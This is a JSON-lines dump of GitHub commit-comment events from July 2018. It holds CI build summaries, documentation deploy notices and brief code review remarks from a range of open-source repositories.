{"id":"8030967796","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29864440,"position":null,"line":null,"path":null,"commit_id":"167cc3fc99ab2baea3fa2ffbe47a806d7b1a1ce7","created_at":"2018-07-27T21:52:29Z","updated_at":"2018-07-27T21:52:29Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [newplanfa](https://newplanfa-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://newplanfa-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-27T21:52:29Z"}
{"id":"8030968286","type":"CommitCommentEvent","actor":{"login":"jb55"},"repo":{"name":"rustyrussell/ccan"},"payload":{"comment":{"id":29864443,"position":null,"line":null,"path":null,"commit_id":"2cd5e81d8beefb95db66f80c6e6d4bbdc989055a","created_at":"2018-07-27T21:52:38Z","updated_at":"2018-07-27T21:52:38Z","author_association":"NONE","body":"much better 👍"}},"created_at":"2018-07-27T21:52:38Z"}
{"id":"8030969702","type":"CommitCommentEvent","actor":{"login":"jusfreeman"},"repo":{"name":"agileware/au.com.agileware.ewayrecurring"},"payload":{"comment":{"id":29864448,"position":1,"line":73,"path":"au_com_agileware_ewayrecurring.class.php","commit_id":"c371709b847bc39ddf371e2031c4029ace941448","created_at":"2018-07-27T21:53:05Z","updated_at":"2018-07-27T21:53:05Z","author_association":"CONTRIBUTOR","body":"Overall, standardise the comment formatting, uses about three different formats."}},"created_at":"2018-07-27T21:53:05Z"}
{"id":"8030971507","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29864452,"position":null,"line":null,"path":null,"commit_id":"06880677faee6712bbb8b1beb94e84ec96ce1bc5","created_at":"2018-07-27T21:53:38Z","updated_at":"2018-07-27T21:53:38Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [newplanfa](https://newplanfa-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://newplanfa-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-27T21:53:38Z"}
{"id":"8030971902","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864454,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-27T21:53:46Z","updated_at":"2018-07-27T21:53:46Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2946 of 2948 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T21:53:46Z"}
{"id":"8030974210","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29864462,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-27T21:54:29Z","updated_at":"2018-07-27T21:54:29Z","author_association":"MEMBER","body":"I've been actually using my personal aports repo for testing this and pushed the commits at once. If you mean squashing the commits into one, then hell no! That would quite defeat the purpose of using VCS for tracking changes, it would be very hard to understand what I've changed from single mega-commit."}},"created_at":"2018-07-27T21:54:29Z"}
{"id":"8030979102","type":"CommitCommentEvent","actor":{"login":"ak239"},"repo":{"name":"GoogleChromeLabs/ndb"},"payload":{"comment":{"id":29864475,"position":12,"line":223,"path":"front_end/ndb/NdbMain.js","commit_id":"a0e79018f9b31494b668c37453d3806e54b1a018","created_at":"2018-07-27T21:55:57Z","updated_at":"2018-07-27T21:55:57Z","author_association":"COLLABORATOR","body":"This is only for case when user opens context menu on file and click \"Run this script\". It is definitely possible to lookup originally passed arguments and use them here. Sounds like good idea to me.\r\n\r\nI will put it on my todo list and I would like to say that contributions are welcome! :)"}},"created_at":"2018-07-27T21:55:57Z"}
{"id":"8030979950","type":"CommitCommentEvent","actor":{"login":"Schamschula"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29864476,"position":64,"line":52,"path":"math/octave-symbolic/Portfile","commit_id":"76fc6aa932eed737bffec7936b5220db09bd5305","created_at":"2018-07-27T21:56:13Z","updated_at":"2018-07-27T21:56:13Z","author_association":"CONTRIBUTOR","body":"Ryan,\n\nGood catch. I’ve also been in contact with the upstream developers, and found a way to properly choose the correct Python version.\n\nRevision coming soon.\n\n> On Jul 27, 2018, at 2:09 PM, Ryan Schmidt <notifications@github.com> wrote:\n> \n> Port py37-sympy does not exist...\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/macports/macports-ports/commit/76fc6aa932eed737bffec7936b5220db09bd5305#commitcomment-29862810>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AMxgirW0kaFJ6LA7Pc99W-Zrn2ItTDQOks5uK2V1gaJpZM4Vkiyk>.\n> \n\nMarius\n--\nMarius Schamschula\n\n\n\n\n"}},"created_at":"2018-07-27T21:56:13Z"}
{"id":"8030982144","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29864485,"position":null,"line":null,"path":null,"commit_id":"e8224be507fdfa3f3dd2889f3073a4ce3eff4523","created_at":"2018-07-27T21:56:53Z","updated_at":"2018-07-27T21:56:53Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [sgldaplin](https://sgldaplin-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/ldap-and-ldaps](https://sgldaplin-static-docs.pantheonsite.io/docs/ldap-and-ldaps)\n"}},"created_at":"2018-07-27T21:56:53Z"}
{"id":"8030989065","type":"CommitCommentEvent","actor":{"login":"WebsByTodd"},"repo":{"name":"mytakedotorg/mytakedotorg"},"payload":{"comment":{"id":29864503,"position":null,"line":null,"path":null,"commit_id":"3fe3209cedd500ac3ddbf0c2e619522a314c7f6b","created_at":"2018-07-27T21:59:03Z","updated_at":"2018-07-27T21:59:03Z","author_association":"COLLABORATOR","body":"How do we offload this one to node? We need this result on the rendering server for a meta tag. Should this route make a blocking call to our node api to get the result?"}},"created_at":"2018-07-27T21:59:03Z"}
{"id":"8030990294","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/ios-sprint1-challenge"},"payload":{"comment":{"id":29864506,"position":null,"line":null,"path":null,"commit_id":"57a8534388110c11ee1ba4bf76f106b73abb19ce","created_at":"2018-07-27T21:59:27Z","updated_at":"2018-07-27T21:59:27Z","author_association":"OWNER","body":"Makes the table view update itself right after the tab is clicked and before the view appears"}},"created_at":"2018-07-27T21:59:27Z"}
{"id":"8030993595","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/ios-sprint1-challenge"},"payload":{"comment":{"id":29864518,"position":null,"line":null,"path":null,"commit_id":"377d11784f53d1acefb0e6a75bfbadc7baa4d2b3","created_at":"2018-07-27T22:00:24Z","updated_at":"2018-07-27T22:00:24Z","author_association":"OWNER","body":"Should have left it as a class so I could make it equatable and implement deletion"}},"created_at":"2018-07-27T22:00:24Z"}
{"id":"8030995531","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29864521,"position":null,"line":null,"path":null,"commit_id":"3ec78468453dc4433f4684d59594f780420cfa8a","created_at":"2018-07-27T22:00:57Z","updated_at":"2018-07-27T22:00:57Z","author_association":"NONE","body":"Congrats !"}},"created_at":"2018-07-27T22:00:57Z"}
{"id":"8030999572","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29864532,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-27T22:02:01Z","updated_at":"2018-07-27T22:02:01Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2304 of 2304 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-27T22:02:01Z"}
{"id":"8031000035","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/ios-sprint1-challenge"},"payload":{"comment":{"id":29864534,"position":null,"line":null,"path":null,"commit_id":"8d1366cee1d3cf34505136132b3ab1b9a67e4522","created_at":"2018-07-27T22:02:09Z","updated_at":"2018-07-27T22:02:09Z","author_association":"OWNER","body":"the viewWillAppear was wrong so when more than one movie was created, the table view wouldn't accommodate for it"}},"created_at":"2018-07-27T22:02:09Z"}
{"id":"8031004079","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29864541,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-27T22:03:23Z","updated_at":"2018-07-27T22:03:23Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T22:03:23Z"}
{"id":"8031004378","type":"CommitCommentEvent","actor":{"login":"NicholasBarreyre"},"repo":{"name":"NicholasBarreyre/magenta"},"payload":{"comment":{"id":29864542,"position":null,"line":null,"path":null,"commit_id":"fcc2de58e8f1c096dc1a797bb314c4b0b9545c28","created_at":"2018-07-27T22:03:28Z","updated_at":"2018-07-27T22:03:28Z","author_association":"OWNER","body":"@osageev Here is the new conditioning"}},"created_at":"2018-07-27T22:03:28Z"}
{"id":"8031006771","type":"CommitCommentEvent","actor":{"login":"sevein"},"repo":{"name":"CCA-Public/dip-access-interface"},"payload":{"comment":{"id":29864551,"position":28,"line":21,"path":"accesspoc/dips/tasks.py","commit_id":"079c5a20683af9b3c97248a632789f0462a47644","created_at":"2018-07-27T22:04:15Z","updated_at":"2018-07-27T22:04:15Z","author_association":"COLLABORATOR","body":"And by the way, ZipFile seems also to be a context manager so you could have it nested to make sure the file is closed when you're done with it! Crazzzzzy"}},"created_at":"2018-07-27T22:04:15Z"}
{"id":"8031007896","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29864555,"position":null,"line":null,"path":null,"commit_id":"3ec78468453dc4433f4684d59594f780420cfa8a","created_at":"2018-07-27T22:04:38Z","updated_at":"2018-07-27T22:04:38Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-27T22:04:38Z"}
{"id":"8031009086","type":"CommitCommentEvent","actor":{"login":"sevein"},"repo":{"name":"CCA-Public/dip-access-interface"},"payload":{"comment":{"id":29864562,"position":28,"line":21,"path":"accesspoc/dips/tasks.py","commit_id":"079c5a20683af9b3c97248a632789f0462a47644","created_at":"2018-07-27T22:05:02Z","updated_at":"2018-07-27T22:05:02Z","author_association":"COLLABORATOR","body":"Check this out! https://stackoverflow.com/a/1073814\r\n\r\nYou're lucky you can enjoy all the Py3 things!!!"}},"created_at":"2018-07-27T22:05:02Z"}
{"id":"8031009525","type":"CommitCommentEvent","actor":{"login":"Crauzer"},"repo":{"name":"LoL-Fantome/LeagueDownloader"},"payload":{"comment":{"id":29864563,"position":null,"line":null,"path":null,"commit_id":"f9b709a5172ff3891da57287076b11db08746e7f","created_at":"2018-07-27T22:05:11Z","updated_at":"2018-07-27T22:05:11Z","author_association":"MEMBER","body":"nice"}},"created_at":"2018-07-27T22:05:11Z"}
{"id":"8031013067","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29864572,"position":null,"line":null,"path":null,"commit_id":"10f673f305cffaf135961d6b631aa8dc793e4d84","created_at":"2018-07-27T22:06:20Z","updated_at":"2018-07-27T22:06:20Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [newplanfa](https://newplanfa-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://newplanfa-static-docs.pantheonsite.io/docs/new-plans-faq)\n- [/docs/site-plan](https://newplanfa-static-docs.pantheonsite.io/docs/site-plan)\n"}},"created_at":"2018-07-27T22:06:20Z"}
{"id":"8031018070","type":"CommitCommentEvent","actor":{"login":"pieper"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29864586,"position":25,"line":52,"path":"Modules/Loadable/Markups/MRML/vtkMRMLMarkupsFiducialStorageNode.cxx","commit_id":"7df26d7925faea88fc1b302082d6c186ffdbe458","created_at":"2018-07-27T22:08:04Z","updated_at":"2018-07-27T22:08:04Z","author_association":"MEMBER","body":"@lassoan on a Qt4 build on linux I get build errors like the following.\r\n\r\n```\r\n[ 60%] Building CXX object Modules/Loadable/Markups/MRML/CMakeFiles/vtkSlicerMarkupsModuleMRML.dir/vtkMRMLMarkupsFiducialStorageNode.cxx.o\r\n/home/pieper/slicer4/latest/Slicer/Modules/Loadable/Markups/MRML/vtkMRMLMarkupsFiducialStorageNode.cxx: In member function \\u2018void CsvCodec::ReadFromString(const string&)\\u2019:\r\n/home/pieper/slicer4/latest/Slicer/Modules/Loadable/Markups/MRML/vtkMRMLMarkupsFiducialStorageNode.cxx:52:22: error: \\u2018CSVState\\u2019 is not a class or namespace\r\n     CSVState state = CSVState::UnquotedField;\r\n                      ^\r\n```\r\n\r\nQt5 build on the same machine works fine.\r\n"}},"created_at":"2018-07-27T22:08:04Z"}
{"id":"8031025552","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864608,"position":null,"line":null,"path":null,"commit_id":"dfb96fb464dd848bca0086b803e95bbbd7e1d7c0","created_at":"2018-07-27T22:10:30Z","updated_at":"2018-07-27T22:10:30Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2329 of 2329 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-27T22:10:30Z"}
{"id":"8031028774","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29864616,"position":null,"line":null,"path":null,"commit_id":"ef22d10b45d18ac498bb6eb4b44c96b0823f8acf","created_at":"2018-07-27T22:11:35Z","updated_at":"2018-07-27T22:11:35Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/ef22d10b45d18ac498bb6eb4b44c96b0823f8acf)\n\nBuilt at __20180727 - 22:11:35__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 537s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 850s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 923s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 559s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 275s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 287s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 721s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 395s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 640s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1163s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 424s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 395s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 293s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 263s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 980s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/fix1578/4//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1194s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-27T22:11:35Z"}
{"id":"8031042188","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864641,"position":null,"line":null,"path":null,"commit_id":"dfb96fb464dd848bca0086b803e95bbbd7e1d7c0","created_at":"2018-07-27T22:16:05Z","updated_at":"2018-07-27T22:16:05Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-27T22:16:05Z"}
{"id":"8031044143","type":"CommitCommentEvent","actor":{"login":"exocom"},"repo":{"name":"aws/aws-lambda-dotnet"},"payload":{"comment":{"id":29864644,"position":4,"line":4,"path":"Libraries/src/Amazon.Lambda.ScheduledEvents/Amazon.Lambda.ScheduledEvents.csproj","commit_id":"ebf80bcbdc3fdb95f0927c5c20542342d8ff1780","created_at":"2018-07-27T22:16:41Z","updated_at":"2018-07-27T22:16:41Z","author_association":"NONE","body":"@Kralizek Nope, just missed this. Used rider to generate the project. Going to update it to match the others."}},"created_at":"2018-07-27T22:16:41Z"}
{"id":"8031047532","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"MatthewKush/xray-oxygen"},"payload":{"comment":{"id":29864651,"position":null,"line":null,"path":null,"commit_id":"72be8940243157ab76f0645a54c23351ca643780","created_at":"2018-07-27T22:17:50Z","updated_at":"2018-07-27T22:17:50Z","author_association":"NONE","body":"Fine"}},"created_at":"2018-07-27T22:17:50Z"}
{"id":"8031047849","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29864653,"position":null,"line":null,"path":null,"commit_id":"5861d9342d51933e80fc0fa31dade2a57924095b","created_at":"2018-07-27T22:17:57Z","updated_at":"2018-07-27T22:17:57Z","author_association":"COLLABORATOR","body":"This was needed for Sun Studio 12.6  and to a lesser extent the low-end dev-boards. Sun Studio 12.6 is taking too long to compile some of the testing source files. In addition Solaris frequently runs out of swap space when compiling the large files. The loss of swap space results in compiler crashes that requires a reboot to clear on Solaris 11.3."}},"created_at":"2018-07-27T22:17:57Z"}
{"id":"8031049722","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29864659,"position":null,"line":null,"path":null,"commit_id":"717be4cb1a516c1ae489888ccb26be89da4123d2","created_at":"2018-07-27T22:18:35Z","updated_at":"2018-07-27T22:18:35Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-51](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-51).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-51-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-27T22:18:35Z"}
{"id":"8031058907","type":"CommitCommentEvent","actor":{"login":"brianrob"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":29864681,"position":22,"line":420,"path":"src/pal/src/thread/thread.cpp","commit_id":"f076ba2aa951c360def8d35d53d6a4a390e52038","created_at":"2018-07-27T22:21:39Z","updated_at":"2018-07-27T22:21:39Z","author_association":"MEMBER","body":"In looking at the PAL, I see that THREADSilentGetCurrentThreadId is implemented here: https://github.com/dotnet/coreclr/blob/master/src/pal/src/include/pal/thread.hpp#L815, which calls syscall(SYS_gettid) on Linux and pthread_threadid_np on OSX.  Have I missed something?"}},"created_at":"2018-07-27T22:21:39Z"}
{"id":"8031059759","type":"CommitCommentEvent","actor":{"login":"spencergibb"},"repo":{"name":"spring-cloud/spring-cloud-gateway"},"payload":{"comment":{"id":29864686,"position":10,"line":67,"path":"spring-cloud-gateway-core/src/main/java/org/springframework/cloud/gateway/handler/predicate/ReadBodyPredicateFactory.java","commit_id":"831008f42d028ef3feae3e58794a6590d401144a","created_at":"2018-07-27T22:21:56Z","updated_at":"2018-07-27T22:21:56Z","author_association":"MEMBER","body":"Maybe it should be logged on debug?"}},"created_at":"2018-07-27T22:21:56Z"}
{"id":"8031093960","type":"CommitCommentEvent","actor":{"login":"bspasso"},"repo":{"name":"bspasso/SENA"},"payload":{"comment":{"id":29864755,"position":null,"line":null,"path":null,"commit_id":"de3f1c0a4c8633116efc4858b68a8a9d4091b738","created_at":"2018-07-27T22:33:56Z","updated_at":"2018-07-27T22:33:56Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-27T22:33:56Z"}
{"id":"8031095664","type":"CommitCommentEvent","actor":{"login":"ChaltinPagan"},"repo":{"name":"ChaltinPagan/chaltinpagan.github.io"},"payload":{"comment":{"id":29864756,"position":null,"line":null,"path":null,"commit_id":"a5dff2993b86fdbec86fae122cccc5eec02e0a26","created_at":"2018-07-27T22:34:31Z","updated_at":"2018-07-27T22:34:31Z","author_association":"OWNER","body":"Changed class of button in .card-header to .card-link. Previous classes .btn and .btn-link did not display well on mobile: no word-wrap and couldn't use css to fix."}},"created_at":"2018-07-27T22:34:31Z"}
{"id":"8031098579","type":"CommitCommentEvent","actor":{"login":"brianrob"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":29864764,"position":22,"line":420,"path":"src/pal/src/thread/thread.cpp","commit_id":"f076ba2aa951c360def8d35d53d6a4a390e52038","created_at":"2018-07-27T22:35:37Z","updated_at":"2018-07-27T22:35:37Z","author_association":"MEMBER","body":"Ok, thanks much."}},"created_at":"2018-07-27T22:35:37Z"}
{"id":"8031099802","type":"CommitCommentEvent","actor":{"login":"stevanka988"},"repo":{"name":"stevanka988/Tournament"},"payload":{"comment":{"id":29864767,"position":null,"line":null,"path":null,"commit_id":"cb592b4311a3ad7e96b548adf28766487383026b","created_at":"2018-07-27T22:36:02Z","updated_at":"2018-07-27T22:36:02Z","author_association":"OWNER","body":"fgf"}},"created_at":"2018-07-27T22:36:02Z"}
{"id":"8031099968","type":"CommitCommentEvent","actor":{"login":"stevanka988"},"repo":{"name":"stevanka988/Tournament"},"payload":{"comment":{"id":29864769,"position":null,"line":null,"path":null,"commit_id":"cb592b4311a3ad7e96b548adf28766487383026b","created_at":"2018-07-27T22:36:06Z","updated_at":"2018-07-27T22:36:06Z","author_association":"OWNER","body":"dfd"}},"created_at":"2018-07-27T22:36:06Z"}
{"id":"8031116472","type":"CommitCommentEvent","actor":{"login":"timkpaine"},"repo":{"name":"timkpaine/perspective-python"},"payload":{"comment":{"id":29864804,"position":null,"line":null,"path":null,"commit_id":"cb42d53c1947f01899f0f8e8c96dcd39784bbd05","created_at":"2018-07-27T22:42:10Z","updated_at":"2018-07-27T22:42:10Z","author_association":"OWNER","body":"<img width=\"474\" alt=\"screen shot 2018-07-27 at 6 41 24 pm\" src=\"https://user-images.githubusercontent.com/3105306/43349283-c43310be-91cc-11e8-97a0-0af49e021d47.png\">\r\n"}},"created_at":"2018-07-27T22:42:10Z"}
{"id":"8031116572","type":"CommitCommentEvent","actor":{"login":"batsman2skip"},"repo":{"name":"ChainsDD/Superuser"},"payload":{"comment":{"id":29864805,"position":4,"line":19,"path":"AndroidManifest.xml","commit_id":"bb5a006a07b2fbd463a7ca9a6133832485aa3d0f","created_at":"2018-07-27T22:42:12Z","updated_at":"2018-07-27T22:42:12Z","author_association":"NONE","body":"40"}},"created_at":"2018-07-27T22:42:12Z"}
